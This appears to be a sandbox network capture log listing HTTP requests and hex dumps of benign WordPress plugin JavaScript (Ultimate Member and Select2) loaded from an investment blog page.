                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-180"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147810
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f45b404387-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC391INData Raw: 31 38 30 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 75 6d 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 2c 75 6d 5f 6d 6f 64 61 6c 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 7d 29 2c 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 5f 2e 64 65 62 6f 75 6e 63 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73 70 6f 6e 73 69 76 65 5f 4d 6f 64 61 6c 28 29 2c 77 70 2e 68 6f 6f 6b 73 2e 64 6f 41 63 74 69 6f 6e 28 22 75 6d 5f 77 69 6e 64 6f 77 5f 72 65 73 69 7a 65 22 29 2c 75 6d 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 2c 75 6d 5f 6d 6f 64 61 6c 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 7d 2c 33 30 30 29 29 2c 77 70 2e 68 6f 6f 6b 73 2e 61 64 64 41 63 74 69 6f 6e 28 22 75 6d 5f
                                                                                                                                                                                                                                                                        Data Ascii: 180jQuery(window).on("load",function(){um_responsive(),um_modal_responsive()}),jQuery(window).on("resize",_.debounce(function(){responsive_Modal(),wp.hooks.doAction("um_window_resize"),um_responsive(),um_modal_responsive()},300)),wp.hooks.addAction("um_
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        69192.168.2.449827141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC799OUTGET /wp-content/plugins/ultimate-member/assets/js/um-conditional.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2603"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147810
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f4ca067cf4-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC877INData Raw: 32 36 30 33 0d 0a 76 61 72 20 61 72 72 5f 61 6c 6c 5f 63 6f 6e 64 69 74 69 6f 6e 73 3d 5b 5d 2c 75 6d 5f 66 69 65 6c 64 5f 63 6f 6e 64 69 74 69 6f 6e 73 3d 7b 7d 2c 75 6d 5f 66 69 65 6c 64 5f 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 28 65 29 7b 76 61 72 20 69 2c 6e 3d 22 22 2c 74 3d 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 65 29 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 74 65 78 74 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 63 61 73 65 22 64 61 74 65 22 3a 63 61 73 65 22 74 65 78 74 61 72 65 61 22 3a 63 61 73 65 22 73 65 6c 65 63 74 22 3a 6e 3d 65 2e 66 69 6e 64 28 27 69 6e 70 75 74 3a 74 65 78 74 2c 69 6e 70 75 74 5b
                                                                                                                                                                                                                                                                        Data Ascii: 2603var arr_all_conditions=[],um_field_conditions={},um_field_default_values={};function um_get_field_default_value(e){var i,n="",t=um_get_field_type(e);switch(t){case"text":case"number":case"date":case"textarea":case"select":n=e.find('input:text,input[
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 72 20 69 3d 65 2e 66 69 6e 64 28 22 69 6e 70 75 74 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 22 29 2c 6e 3d 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 65 29 3b 72 65 74 75 72 6e 20 77 70 2e 68 6f 6f 6b 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 75 6d 5f 63 6f 6e 64 69 74 69 6f 6e 61 6c 5f 6c 6f 67 69 63 5f 66 69 65 6c 64 5f 65 6c 65 6d 65 6e 74 22 2c 69 2c 6e 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 65 29 7b 76 61 72 20 6e 3d 22 22 2c 65 3d 65 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 2f 75 6d 2d 66 69 65 6c 64 2d 74 79 70 65 5f 2f 2e 74 65 73
                                                                                                                                                                                                                                                                        Data Ascii: r i=e.find("input,textarea,select"),n=um_get_field_type(e);return wp.hooks.applyFilters("um_conditional_logic_field_element",i,n,e)}function um_get_field_type(e){var n="",e=e.attr("class").split(" ");return jQuery.each(e,function(e,i){/um-field-type_/.tes
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 72 65 61 6b 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 61 70 70 6c 79 5f 63 6f 6e 64 69 74 69 6f 6e 73 28 6e 2c 65 29 7b 76 61 72 20 69 2c 74 2c 61 2c 75 2c 6f 2c 72 3b 6e 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 2e 6c 65 6e 67 74 68 26 26 28 69 3d 6e 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 2e 64 61 74 61 28 22 6b 65 79 22 29 2c 76 6f 69 64 20 30 21 3d 3d 28 69 3d 75 6d 5f 66 69 65 6c 64 5f 63 6f 6e 64 69 74 69 6f 6e 73 5b 69 5d 29 29 26 26 28 74 3d 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 6e 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 29 2c 22 65 6d 70 74 79 5f 66 69
                                                                                                                                                                                                                                                                        Data Ascii: reak}return a}function um_apply_conditions(n,e){var i,t,a,u,o,r;n.parents(".um-field[data-key]").length&&(i=n.parents(".um-field[data-key]").data("key"),void 0!==(i=um_field_conditions[i]))&&(t=um_get_field_type(n.parents(".um-field[data-key]")),"empty_fi
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 2c 22 63 6f 6e 74 61 69 6e 73 22 3d 3d 3d 69 2e 6f 70 65 72 61 74 6f 72 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 6d 75 6c 74 69 73 65 6c 65 63 74 22 3a 61 26 26 30 3c 3d 61 2e 69 6e 64 65 78 4f 66 28 69 2e 76 61 6c 75 65 29 26 26 75 6d 5f 69 6e 5f 61 72 72 61 79 28 69 2e 76 61 6c 75 65 2c 61 29 3f 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 30 3a 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 31 3b 62 72 65 61 6b 3b 63 61 73 65 22 63 68 65 63 6b 62 6f 78 22 3a 61 26 26 30 3c 3d 61 2e 69 6e 64 65 78 4f 66 28 69 2e 76 61 6c 75 65 29 3f 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 30 3a 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 31 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 76 6f 69 64 20 30 3d 3d 3d 28 75 3d 77 70 2e 68 6f 6f 6b 73 2e 61 70 70 6c
                                                                                                                                                                                                                                                                        Data Ascii: ,"contains"===i.operator)switch(t){case"multiselect":a&&0<=a.indexOf(i.value)&&um_in_array(i.value,a)?u[i.owner][e]=!0:u[i.owner][e]=!1;break;case"checkbox":a&&0<=a.indexOf(i.value)?u[i.owner][e]=!0:u[i.owner][e]=!1;break;default:void 0===(u=wp.hooks.appl
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 28 22 63 68 61 6e 67 65 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6d 75 6c 74 69 73 65 6c 65 63 74 22 3a 6e 2e 66 69 6e 64 28 22 73 65 6c 65 63 74 22 29 2e 66 69 6e 64 28 22 6f 70 74 69 6f 6e 22 29 2e 70 72 6f 70 28 22 73 65 6c 65 63 74 65 64 22 2c 21 31 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 61 2e 76 61 6c 75 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 6e 2e 66 69 6e 64 28 22 73 65 6c 65 63 74 22 29 2e 66 69 6e 64 28 27 6f 70 74 69 6f 6e 5b 76 61 6c 75 65 3d 22 27 2b 69 2b 27 22 5d 27 29 2e 61 74 74 72 28 22 73 65 6c 65 63 74 65 64 22 2c 21 30 29 7d 29 2c 6e 2e 66 69 6e 64 28 22 73 65 6c 65 63 74 22 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 63 68 65 63 6b 62 6f 78 22 3a 31 3c 3d 6e 2e 66 69 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: ("change");break;case"multiselect":n.find("select").find("option").prop("selected",!1),jQuery.each(a.value,function(e,i){n.find("select").find('option[value="'+i+'"]').attr("selected",!0)}),n.find("select").trigger("change");break;case"checkbox":1<=n.find
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 27 29 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 2c 21 31 29 2c 6e 2e 66 69 6e 64 28 22 73 70 61 6e 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 2d 73 74 61 74 65 20 69 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 6d 2d 69 63 6f 6e 2d 61 6e 64 72 6f 69 64 2d 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 6f 6e 22 29 2c 6e 2e 66 69 6e 64 28 22 73 70 61 6e 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 2d 73 74 61 74 65 20 69 22 29 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 2d 69 63 6f 6e 2d 61 6e 64 72 6f 69 64 2d 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 6f 66 66 22 29 2c 6e 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 2e 61 63 74 69 76 65 22 29 2e 72
                                                                                                                                                                                                                                                                        Data Ascii: nd('input[type="radio"]:checked').prop("checked",!1),n.find("span.um-field-radio-state i").removeClass("um-icon-android-radio-button-on"),n.find("span.um-field-radio-state i").addClass("um-icon-android-radio-button-off"),n.find(".um-field-radio.active").r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 79 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6b 65 79 22 29 2c 61 3d 28 65 2e 70 75 73 68 28 6e 29 2c 7b 7d 29 3b 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 74 68 69 73 29 5b 30 5d 2e 61 74 74 72 69 62 75 74 65 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 2c 74 3b 2d 31 21 3d 3d 69 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 63 6f 6e 64 22 29 26 26 28 6e 3d 28 74 3d 69 2e 6e 61 6d 65 2e 73 6c 69 63 65 28 31 30 29 29 2e 73 75 62 73 74 72 69 6e 67 28 31 2c 30 29 2c 74 3d 74 2e 73 6c 69 63 65 28 32 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 5b 6e 5d 26 26 28 61 5b 6e
                                                                                                                                                                                                                                                                        Data Ascii: y(".um-field[data-key]").each(function(){var n=jQuery(this).data("key"),a=(e.push(n),{});jQuery.each(jQuery(this)[0].attributes,function(e,i){var n,t;-1!==i.name.indexOf("data-cond")&&(n=(t=i.name.slice(10)).substring(1,0),t=t.slice(2),void 0===a[n]&&(a[n
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC648INData Raw: 6e 28 22 63 68 61 6e 67 65 22 2c 27 2e 75 6d 2d 66 69 65 6c 64 2d 69 6d 61 67 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 2c 2e 75 6d 2d 66 69 65 6c 64 2d 66 69 6c 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 75 6d 5f 61 70 70 6c 79 5f 63 6f 6e 64 69 74 69 6f 6e 73 28 6a 51 75 65 72 79 28 74 68 69 73 29 2c 21 31 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 66 69 6e 69 73 68 2d 75 70 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6b 65 79 22 29 2c 69 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 22 2b 65 2b
                                                                                                                                                                                                                                                                        Data Ascii: n("change",'.um-field-image input[type="hidden"],.um-field-file input[type="hidden"]',function(){um_apply_conditions(jQuery(this),!1)}),jQuery(document).on("click",".um-finish-upload",function(){var e=jQuery(this).attr("data-key"),i=jQuery(".um-field-"+e+
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        70192.168.2.449828141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC808OUTGET /wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.js?ver=4.0.13 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-1356c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147811
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f5ddab7c87-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC876INData Raw: 37 64 63 34 0d 0a 2f 2a 21 20 53 65 6c 65 63 74 32 20 34 2e 30 2e 31 33 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 65 6c 65 63 74 32 2f 73 65 6c 65 63 74 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 2e 6d 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 6e 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 22 75 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: 7dc4/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */!function(n){"function"==typeof define&&define.amd?define(["jquery"],n):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="und
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 2e 73 70 6c 69 63 65 28 75 2d 31 2c 32 29 2c 75 2d 3d 32 29 7d 65 3d 65 2e 6a 6f 69 6e 28 22 2f 22 29 7d 69 66 28 28 68 7c 7c 67 29 26 26 66 29 7b 66 6f 72 28 75 3d 28 6e 3d 65 2e 73 70 6c 69 74 28 22 2f 22 29 29 2e 6c 65 6e 67 74 68 3b 30 3c 75 3b 75 2d 3d 31 29 7b 69 66 28 69 3d 6e 2e 73 6c 69 63 65 28 30 2c 75 29 2e 6a 6f 69 6e 28 22 2f 22 29 2c 68 29 66 6f 72 28 64 3d 68 2e 6c 65 6e 67 74 68 3b 30 3c 64 3b 64 2d 3d 31 29 69 66 28 72 3d 28 72 3d 66 5b 68 2e 73 6c 69 63 65 28 30 2c 64 29 2e 6a 6f 69 6e 28 22 2f 22 29 5d 29 26 26 72 5b 69 5d 29 7b 6f 3d 72 2c 61 3d 75 3b 62 72 65 61 6b 7d 69 66 28 6f 29 62 72 65 61 6b 3b 21 6c 26 26 67 26 26 67 5b 69 5d 26 26 28 6c 3d 67 5b 69 5d 2c 63 3d 75 29 7d 21 6f 26 26 6c 26 26 28 6f 3d 6c 2c 61 3d 63 29 2c 6f 26
                                                                                                                                                                                                                                                                        Data Ascii: .splice(u-1,2),u-=2)}e=e.join("/")}if((h||g)&&f){for(u=(n=e.split("/")).length;0<u;u-=1){if(i=n.slice(0,u).join("/"),h)for(d=h.length;0<d;d-=1)if(r=(r=f[h.slice(0,d).join("/")])&&r[i]){o=r,a=u;break}if(o)break;!l&&g&&g[i]&&(l=g[i],c=u)}!o&&l&&(o=l,a=c),o&
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 6e 3b 69 66 28 63 3d 53 28 69 3d 69 7c 7c 65 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 70 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 70 29 7b 66 6f 72 28 74 3d 21 74 2e 6c 65 6e 67 74 68 26 26 6e 2e 6c 65 6e 67 74 68 3f 5b 22 72 65 71 75 69 72 65 22 2c 22 65 78 70 6f 72 74 73 22 2c 22 6d 6f 64 75 6c 65 22 5d 3a 74 2c 6c 3d 30 3b 6c 3c 74 2e 6c 65 6e 67 74 68 3b 6c 2b 3d 31 29 69 66 28 22 72 65 71 75 69 72 65 22 3d 3d 3d 28 6f 3d 28 61 3d 66 28 74 5b 6c 5d 2c 63 29 29 2e 66 29 29 64 5b 6c 5d 3d 67 2e 72 65 71 75 69 72 65 28 65 29 3b 65 6c 73 65 20 69 66 28 22 65 78 70 6f 72 74 73 22 3d 3d 3d 6f 29 64 5b 6c 5d 3d 67 2e 65 78 70 6f 72 74 73 28 65 29 2c 75 3d 21 30 3b 65 6c 73 65 20 69 66 28 22 6d 6f 64 75 6c 65 22 3d 3d 3d 6f 29 72
                                                                                                                                                                                                                                                                        Data Ascii: =typeof n;if(c=S(i=i||e),"undefined"==p||"function"==p){for(t=!t.length&&n.length?["require","exports","module"]:t,l=0;l<t.length;l+=1)if("require"===(o=(a=f(t[l],c)).f))d[l]=g.require(e);else if("exports"===o)d[l]=g.exports(e),u=!0;else if("module"===o)r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 28 22 73 65 6c 65 63 74 32 2f 75 74 69 6c 73 22 2c 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 76 61 72 20 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 5b 69 5d 26 26 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 21 3d 3d 69 26 26 6e 2e 70 75 73 68 28 69 29 7d 72 65 74 75 72 6e 20 6e 7d 72 2e 45 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 7d 66 6f 72 28 76 61 72 20 72 20 69
                                                                                                                                                                                                                                                                        Data Ascii: ("select2/utils",["jquery"],function(o){var r={};function u(e){var t=e.prototype,n=[];for(var i in t){"function"==typeof t[i]&&"constructor"!==i&&n.push(i)}return n}r.Extend=function(e,t){var n={}.hasOwnProperty;function i(){this.constructor=e}for(var r i
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 2c 74 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 2c 22 2a 22 69 6e 20 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 26 26 74 68 69 73 2e 69 6e 76 6f 6b 65 28 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 22 2a 22 5d 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 76 6f 6b 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 65 5b 6e 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 74 29 7d 2c 72 2e 4f 62 73 65 72 76 61 62 6c 65 3d 65 2c 72 2e 67 65 6e 65 72 61 74 65 43 68 61 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 22 22 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 7b 74
